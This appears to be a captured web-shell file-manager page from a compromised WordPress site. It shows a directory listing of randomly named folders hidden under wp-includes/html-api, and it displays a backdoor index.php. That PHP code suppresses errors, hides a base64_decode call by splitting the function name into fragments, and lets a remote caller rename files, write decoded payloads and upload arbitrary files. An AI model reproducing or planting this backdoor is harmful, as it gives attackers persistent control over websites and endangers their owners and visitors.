/
home
/
techb158
/
dev.aleamaralawal.com
/
wp-includes
/
html-api
/
1ekqvxb
/
wpbiomc
/
lcmdjpr
/
/home/techb158/dev.aleamaralawal.com/wp-includes/html-api/1ekqvxb/wpbiomc/lcmdjpr
mkdir
upload
Name
Size
Mode
Actions
index.php
344
0444
edit
dl
rm
php.ini
105
0644
edit
dl
rm
Edit:
/home/techb158/dev.aleamaralawal.com/wp-includes/html-api/1ekqvxb/wpbiomc/lcmdjpr/index.php
(344B)
<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'ba'.'se'.'64'.'_d'.'ec'.'ode'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>
Save